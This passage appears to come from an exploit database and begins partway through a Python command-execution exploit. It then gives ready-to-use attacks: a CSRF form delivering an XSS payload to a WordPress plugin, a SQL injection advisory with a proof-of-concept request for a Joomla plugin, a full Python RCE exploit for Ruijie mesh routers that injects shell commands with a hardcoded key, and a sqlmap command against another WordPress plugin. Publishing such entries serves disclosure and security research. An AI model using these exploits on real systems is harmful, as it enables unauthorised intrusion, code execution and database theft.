password") parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000") parser.add_argument('--cmd', required=False, help="Command to run") parser.add_argument('--raw_cmd', required=False, help="Command to run directly into system()") args = parser.parse_args() username = args.username password = args.password host = args.host cmd = "id" if args.cmd == None else args.cmd raw_cmd = "" if args.raw_cmd == None else args.raw_cmd r_client = requests.Session() login(username, password) ident_string = add_settings(cmd, raw_cmd=raw_cmd) get_cmd_result(ident_string, raw_cmd=raw_cmd)

Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Date: 2021-07-27 Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Vendor Homepage : https://wpscan.com/plugin/blue-admi Version : <= 21.06.01 Tested on: windows 10 Professional CVE : CVE-2021-24581 <html> <body> <form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" /> <input type="hidden" name="ba_lp_attr[fm_color]" value="777777" /> <input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' /> <input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" /> <input type="hidden" name="ba_lp_attr[logo_img]" value="" /> <input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" /> <input type="hidden" name="ba_lp_attr[text_color]" value="222222" /> <input type="hidden" name="ba_lp_attr[bg_img]" value="" /> <input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" /> <input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" /> <input type="hidden" name="ba_lp_options_save" value="Save changes" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi # Google Dork: intext:"Powered by Sexy Polling" # Date: 2022-02-08 # Exploit Author: Wolfgang Hotwagner # Vendor Homepage: https://2glux.com/projects/sexypolling # Software Link: https://2glux.com/downloads/files/free/sexypolling_pack_2.1.7_2glux.com.zip # Version: all versions below version 2.1.8 # Tested on: Debian Bullseye SexyPolling SQL Injection ==================== | Identifier: | AIT-SA-20220208-01| | Target: | Sexy Polling ( Joomla Extension) | | Vendor: | 2glux | | Version: | all versions below version 2.1.8 | | CVE: | Not yet | | Accessibility: | Remote | | Severity: | Critical | | Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) | Summary ======== [Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php. Vulnerability Description ==================== In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections. In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked: ``` $min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : ''; $max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : ''; ``` These are later used unfiltered by the WHERE clause: ``` $query_toal = "SELECT COUNT(sv.`id_answer`) total_count, MAX(sv.`date`) max_date, MIN(sv.`date`) min_date FROM `#__sexy_votes` sv JOIN `#__sexy_answers` sa ON sa.id_poll = '$polling_id' AND sa.published = '1' WHERE sv.`id_answer` = sa.id"; //if dates are sent, add them to query if ($min_date_sended != '' && $max_date_sended != '') $query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' "; ``` Proof Of Concept ============== To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe. HTTP-Request: ``` POST /components/com_sexypolling/vote.php HTTP/1.1 Host: joomla-server.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest HTTP_X_REAL_IP: 1.1.1.1 Content-Length: 193 Origin: joomla-server.local Connection: close Referer: joomla-server.local/index.php/component/search/ Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6 polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1 ``` The HTTP-Resoonse contains a mysql error: ``` HTTP/1.1 500 Internal Server Error Date: Wed, 15 Dec 2021 10:27:40 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/ Content-Length: 4768 Connection: close Content-Type: application/json <!DOCTYPE html> <html lang="en-gb" dir="ltr"> <head> <meta charset="utf-8" /> <title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#039;00:00:00&#039; AND sv.`date` <= &#039;2021-12-14 23:59:59&#039;&#039; at line 12</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" /> ``` Vulnerable Versions ================ All versions below version 2.1.8 Tested Versions ============= Sexy Polling ( Joomla Extension) 2.1.7 Impact ====== An unauthenticated attacker could inject and execute SQL commands on the database. Mitigation ========= Sexy Polling 2.1.8 fixed that issue Vendor Contact Timeline ==================== | 2021-12-14 | Unable to find a contact of the vendor | | 2021-12-15 | Contacting Joomla Security Strike Team | | 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. | | 2022-01-01 | Sexy Polling releases 2.1.8 | | 2022-04-08 | Public Disclosure | *We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.* Advisory URL =========== [https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)

# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) # Google Dork: None # Date: November 1, 2021 # Exploit Author: Minh Khoa of VSEC # Vendor Homepage: https://ruijienetworks.com # Software Link: https://www.ruijienetworks.com/resources/products/1896-1900 # Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55 # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO # CVE: CVE-2021-43164 #!/usr/bin/python3 import os import sys import time import requests import json def enc(PASS): key = "RjYkhwzx$2018!" shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key) return os.popen(shell).read().strip() try: TARGET = sys.argv[1] USER = sys.argv[2] PASS = sys.argv[3] COMMAND = sys.argv[4] except Exception: print("CVE-2021-43164 PoC") print("Usage: python3 exploit.py <target> <user> <pass> <command>") print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'") sys.exit(1) endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET) payload = { "method": "login", "params": { "username": USER, "password": enc(PASS), "encry": True, "time": int(time.time()), "limit": False } } r = requests.post(endpoint, json=payload) sid = json.loads(r.text)["data"]["sid"] endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid) payload = { "method": "updateVersion", "params": { "jsonparam": "'; {} #".format(COMMAND) } } r = requests.post(endpoint, json=payload) print(r.text)

# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated) # Date: 05-02-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/stafflist/ # Version: 3.1.2 # Tested on: Firefox # Contact me: h [at] spidersilk.com # Vulnerable Code: $w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ? ... $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR LOWER(firstname) LIKE '%{$w}%' OR LOWER(department) LIKE '%{$w}%' OR LOWER(email) LIKE '%{$w}%'" : ""); # Vulnerable URL http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI] # POC ``` sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*' --cookie="wordpress_cookies_paste_here" ``` # POC Image https://prnt.sc/AECcFRHhe2ib